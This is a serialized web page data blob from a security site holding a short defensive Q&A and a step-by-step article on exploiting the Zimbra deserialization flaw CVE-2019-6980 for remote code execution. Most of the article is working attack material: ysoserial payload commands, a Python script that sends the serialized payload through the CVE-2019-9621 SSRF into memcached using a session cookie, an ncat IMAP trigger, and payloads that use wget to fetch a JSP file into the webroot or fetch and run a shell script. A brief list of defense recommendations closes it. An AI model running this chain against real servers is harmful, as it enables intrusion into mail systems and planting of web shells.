[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fA_v1I9kLw6BEIqRHLo7MpSQox-SX8YywvwqAS3lKOq8":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":50,"createdAt":50,"_status":49},758,"How can organizations defend against CVE-2019-6980?","The primary defense is to apply the official Zimbra patch released for CVE-2019-6980 and update the software to a non‑vulnerable version. Additionally, administrators should ensure that the memcached service is not exposed externally, restrict access to the IMAP port, and disable or mitigate the SSRF vulnerability (CVE-2019-9621) by limiting outbound proxy requests. For a broader perspective on securing exposed services, see the [Sophos UTM Exploitation Analysis - Exporting Configuration Files](\u002Fnews\u002Fsophos-utm-exploitation-analysis-exporting-configuration-files) for lessons on configuration hardening.","\u003Cp>The primary defense is to apply the official Zimbra patch released for CVE-2019-6980 and update the software to a non‑vulnerable version. Additionally, administrators should ensure that the memcached service is not exposed externally, restrict access to the IMAP port, and disable or mitigate the SSRF vulnerability (CVE-2019-9621) by limiting outbound proxy requests. For a broader perspective on securing exposed services, see the [Sophos UTM Exploitation Analysis - Exporting Configuration Files](\u002Fnews\u002Fsophos-utm-exploitation-analysis-exporting-configuration-files) for lessons on configuration hardening.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fzimbra-deserialization-vulnerability-cve-2019-6980-exploitation-test\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-organizations-defend-against-cve-2019-6980-1777482002140","defense, patching, mitigation, CVE-2019-6980, Zimbra security, SSRF prevention, memcached security",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":46,"updatedAt":47,"createdAt":48,"_status":49},186,"Zimbra Deserialization Vulnerability (CVE-2019-6980) Exploitation Test","zimbra-deserialization-vulnerability-cve-2019-6980-exploitation-test","Step-by-step guide to exploit Zimbra CVE-2019-6980 deserialization vulnerability for remote code execution. Includes environment setup, payload generation, and open-source exploit script.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Zimbra deserialization vulnerability (CVE-2019-6980) affects Zimbra mail servers from version 8.7.x to 8.8.11 and is a remote code execution vulnerability.\u003C\u002Fp>\u003Cp>Considering that more than two years have passed since the patch was publicly released and there is no complete available POC, this article will document the testing process from a technical research perspective, open-source the exploitation script, and share the details.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Local vulnerability reproduction\u003C\u002Fli>\u003Cli>Practical exploitation analysis\u003C\u002Fli>\u003Cli>Open-source exploitation script\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Local Vulnerability Reproduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.tint0.com\u002F2019\u002F03\u002Fa-saga-of-code-executions-on-zimbra.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.csdn.net\u002Ffnmsd\u002Farticle\u002Fdetails\u002F89235589?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&amp;dist_request_id=1328603.11954.16149289993579653&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control\u003C\u002Fp>\u003Ch4>(1) Environment Setup\u003C\u002Fh4>\u003Cp>Select a Zimbra mail server version matching the vulnerability, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.zimbra.com\u002Fdownloads\u002Fzimbra-collaboration-open-source\u002Farchives\u002F\u003C\u002Fp>\u003Cp>For specific setup process, refer to other materials\u003C\u002Fp>\u003Ch4>(2) Create User\u003C\u002Fh4>\u003Cp>Create a test user test1, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ca test1@test.zimbra.com Password123 displayName\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result returns the zimbraId corresponding to test user test1, format: 11111111-1111-1111-1111-111111111111\u003C\u002Fp>\u003Cp>\u003Cstrong>Supplement: Other common commands\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Reference: https:\u002F\u002Fwiki.zimbra.com\u002Fwiki\u002FZmprov\u003C\u002Fp>\u003Cp>List all users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov -l gaa\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>List all administrator users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gaaa\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View the zimbraId corresponding to user test1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ga test1 zimbraId\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Modify server configuration\u003C\u002Fh4>\u003Cp>List all servers:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gad\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the server name test.zimbra.com\u003C\u002Fp>\u003Cp>View configuration information zimbraMemcachedClientServerList:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gs test.zimbra.com zimbraMemcachedClientServerList\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Default return result is empty\u003C\u002Fp>\u003Cp>Set the value of zimbraMemcachedClientServerList to 127.0.0.1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ms test.zimbra.com zimbraMemcachedClientServerList 127.0.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Restart Zimbra\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmcontrol restart\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Restart Zimbra is required for the first modification of zimbraMemcachedClientServerList\u003C\u002Fp>\u003Cp>If it's not the first modification of zimbraMemcachedClientServerList, execute the ReloadMemcachedClientConfig command after setting:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov rmcc all\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) Generate Payload\u003C\u002Fh4>\u003Cp>ysoserial is required here\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fbin\u002Ftouch \u002Ftmp\u002Ftest12345\" &gt; test.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) Log in to test user test1 and obtain Cookie\u003C\u002Fh4>\u003Cp>Log in to test user test1 via browser, retrieve the login Cookie, information as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>0_8ef6794c8d0d991add9ebd717c09e7f7b69b8d76_69641d11161a19166611181165102d161411172d146218192d626611662d1516641717156217621062651b6578701d11111a111611111718161114121117161b76761d111a101b747970651d161a7a696d6272611b7469641d191a1211171011181914121b76657271696f6e1d11111a182e162e105f47415f111115111b617172661d111a111b;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(7) Send Payload\u003C\u002Fh4>\u003Cp>Python2.7 is required here\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Python3 requires consideration of byte array type conversion\u003C\u002Fp>\u003Cp>Python2.7 code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import requests\u003Cbr>from requests.packages.urllib3.exceptions import InsecureRequestWarning\u003Cbr>requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\u003Cbr>\u003Cbr>accountid = \"11111111-1111-1111-1111-111111111111\"\u003Cbr>folderNo= 2\u003Cbr>modseq = 1\u003Cbr>uidvalidity = 1\u003Cbr>cacheKey =\"zmImap:{accountId}:{folderNo}:{modseq}:{uidvalidity}\".format(accountId=accountid,folderNo=str(folderNo),modseq=str(modseq),uidvalidity=str(uidvalidity))\u003Cbr>print(cacheKey)\u003Cbr>with open(r\"test.obj\",\"rb\") as f:\u003Cbr>    payload = f.read()\u003Cbr>\u003Cbr>set_command = b\"set {cacheKey} 2048 3600 {payloadsize}\\r\\n\".format(cacheKey=cacheKey,payloadsize=str(len(payload)))+payload+\"\\r\\n\"\u003Cbr>\u003Cbr>headers = {\u003Cbr>    \"Cookie\":\"ZM_ADMIN_AUTH_TOKEN=0_8ef6794c8d0d991add9ebd717c09e7f7b69b8d76_69641d11161a19166611181165102d161411172d146218192d626611662d1516641717156217621062651b6578701d11111a111611111718161114121117161b76761d111a101b747970651d161a7a696d6272611b7469641d191a1211171011181914121b76657271696f6e1d11111a182e162e105f47415f111115111b617172661d111a111b\",\u003Cbr>    \"host\":\"foo:7071\"\u003Cbr>}\u003Cbr>r = requests.post(\"https:\u002F\u002F192.168.1.1\u002Fservice\u002Fproxy?target=http:\u002F\u002F127.0.0.1:11211\", data=set_command, headers=headers, verify=False)\u003Cbr>print r.text\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above code is modified from \"Zimbra SSRF+Memcached+Deserialization Vulnerability Exploitation Reproduction\"\u003C\u002Fp>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>accountid: corresponds to zimbraId\u003C\u002Fli>\u003Cli>folderNo: 2 represents inbox\u003C\u002Fli>\u003Cli>modseq: for new users, defaults to 1\u003C\u002Fli>\u003Cli>uidvalidity: for new users, defaults to 1\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Code details:\u003C\u002Fp>\u003Cp>Here, Cookie information needs to be added. Fill in the token after ordinary user login, set the name as ZM_ADMIN_AUTH_TOKEN. The request address is https:\u002F\u002F192.168.1.1\u002Fservice\u002Fproxy?target=http:\u002F\u002F127.0.0.1:11211. This is to use the SSRF (CVE-2019-9621) vulnerability to ultimately send data to port 11211.\u003C\u002Fp>\u003Cp>Typically, Zimbra does not expose port 11211 externally. However, if it is open, the above code can be modified to directly access port 11211, no longer requiring the SSRF (CVE-2019-9621) vulnerability.\u003C\u002Fp>\u003Ch4>(8) Trigger deserialization to execute code\u003C\u002Fh4>\u003Cp>Use nc to log in to the test user test1 via imap-ssl protocol, access the inbox, and trigger the vulnerability.\u003C\u002Fp>\u003Cp>The commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ncat --ssl 192.168.1.1 993\u003Cbr>a001 login test1@test.zimbra.com Password123\u003Cbr>a001 select inbox\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Practical Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Applicable Conditions\u003C\u002Fh3>\u003Cp>Can be divided into the following two scenarios:\u003C\u002Fp>\u003Ch4>(1) Zimbra server version is 8.7.x to 8.8.11\u003C\u002Fh4>\u003Cp>Able to access the imap-ssl port (default 993)\u003C\u002Fp>\u003Cp>Presence of SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Cp>If the server has not configured zimbraMemcachedClientServerList, it needs to be set to 127.0.0.1 via the SSRF (CVE-2019-9621) vulnerability and wait for Zimbra to restart\u003C\u002Fp>\u003Ch4>(2) Zimbra server version is 8.7.x to 8.8.11\u003C\u002Fh4>\u003Cp>Must be able to access the imap-ssl port (default 993)\u003C\u002Fp>\u003Cp>Absence of SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Cp>Need to obtain a user credential (plaintext password)\u003C\u002Fp>\u003Cp>Need to be able to access port 11211\u003C\u002Fp>\u003Cp>The value of zimbraMemcachedClientServerList needs to be set to 127.0.0.1\u003C\u002Fp>\u003Cp>The second scenario is too restrictive; usually it's the first scenario, so next we'll introduce the exploitation method in conjunction with the SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Ch3>2. Exploitation Process\u003C\u002Fh3>\u003Cp>The exploitation of the SSRF (CVE-2019-9621) vulnerability can use the previously open-source script Zimbra_SOAP_API_Manage.py\u003C\u002Fp>\u003Ch4>(1) Create User\u003C\u002Fh4>\u003Cp>Use the command CreateAccountSSRF to create a new user\u003C\u002Fp>\u003Ch4>(2) View Configuration\u003C\u002Fh4>\u003Cp>Use the command GetMemcachedClientConfigSSRF to obtain zimbraMemcachedClientServerList; if the result is not 127.0.0.1, it needs to be reset\u003C\u002Fp>\u003Ch4>(3) Set zimbraMemcachedClientServerList\u003C\u002Fh4>\u003Cp>Use the command GetServerSSRF to obtain the ServerID, to be used as a parameter\u003C\u002Fp>\u003Cp>Use the command ModifyServerSSRF to modify the configuration, with the name zimbraMemcachedClientServerList and the value 127.0.0.1\u003C\u002Fp>\u003Ch4>(4) Reload\u003C\u002Fh4>\u003Cp>Use the command ReloadMemcachedClientConfigSSRF to make the modification take effect\u003C\u002Fp>\u003Ch4>(5) Generate Payload\u003C\u002Fh4>\u003Cp>Use the MozillaRhino2 feature in ysoserial\u003C\u002Fp>\u003Cp>MozillaRhino2 implements execution of Linux commands via the exec() method in its code. Note that the exec() method cannot execute commands containing special characters, such as | &gt;\u003C\u002Fp>\u003Cp>That is to say, file write operations cannot be achieved via special characters like &gt;\u003C\u002Fp>\u003Cp>Here, the wget command can be used instead\u003C\u002Fp>\u003Cp>Command Example 1: Directly download a jsp file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fusr\u002Fbin\u002Fwget https:\u002F\u002F192.168.1.1\u002Ftest.jsp --no-check-certificate -O \u002Fopt\u002Fzimbra\u002Fjetty\u002Fwebapps\u002Fzimbra\u002Fpublic\u002Ftest.jsp\" &gt; payload.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command Example 2: Download an sh script, then execute it\u003C\u002Fp>\u003Cp>The content of test.sh is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#!\u002Fbin\u002Fsh\u003Cbr>PATH=\u002Fbin:\u002Fsbin:\u002Fusr\u002Fbin:\u002Fusr\u002Fsbin:\u002Fusr\u002Flocal\u002Fbin:\u002Fusr\u002Flocal\u002Fgit\u002Fbin:\u002Fusr\u002Flocal\u002Fsbin:~\u002Fbin\u003Cbr>echo $PWD &gt;\u002Ftmp\u002Ftest\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to generate Payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fusr\u002Fbin\u002Fwget https:\u002F\u002F192.168.1.1\u002Ftest.sh --no-check-certificate -O \u002Ftmp\u002Ftest.sh\" &gt; payload.obj\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fbin\u002Fsh \u002Ftmp\u002Ftest.sh\" &gt; payload.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) Execute script Zimbra_deserialization_RCE(CVE-2019-6980).py\u003C\u002Fh4>\u003Cp>Zimbra_deserialization_RCE(CVE-2019-6980).py automatically performs the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Log in as a user to obtain a Cookie\u003C\u002Fli>\u003Cli>Obtain the user's corresponding zimbraId via GetAccountInfoRequest\u003C\u002Fli>\u003Cli>Send Payload to port 11211 via the SSRF (CVE-2019-9621) vulnerability\u003C\u002Fli>\u003Cli>Log in as the user using the imap-ssl protocol, access the inbox, trigger the deserialization vulnerability, and execute code\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project).py\u003C\u002Fp>\u003Cp>It should be noted here that when Python uses imaplib to implement the imap-ssl protocol, it can obtain the uidvalidity value but cannot obtain the modseq value\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Upgrade the version, install patches\u003C\u002Fp>\u003Cp>Prohibit external access to port 11211\u003C\u002Fp>\u003Cp>Prohibit external access to port 7071\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the testing process of the Zimbra deserialization vulnerability (CVE-2019-6980), the open-source exploit script Zimbra_deserialization_RCE(CVE-2019-6980).py, and shares the details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",5,"published","2026-02-02T07:38:21.200Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Zimbra CVE-2019-6980 Exploit: RCE Vulnerability Testing Guide","Zimbra deserialization vulnerability, CVE-2019-6980, remote code execution, exploit script, security testing, Zimbra RCE, vulnerability reproduction, memcached exploit",false,[],{"docs":41,"hasNextPage":38},[4,42,43,44,45],757,756,755,754,{"title":30,"description":30,"image":30},"2026-07-24T02:07:19.494Z","2026-07-23T16:02:03.333Z","draft","2026-07-23T16:14:35.157Z"]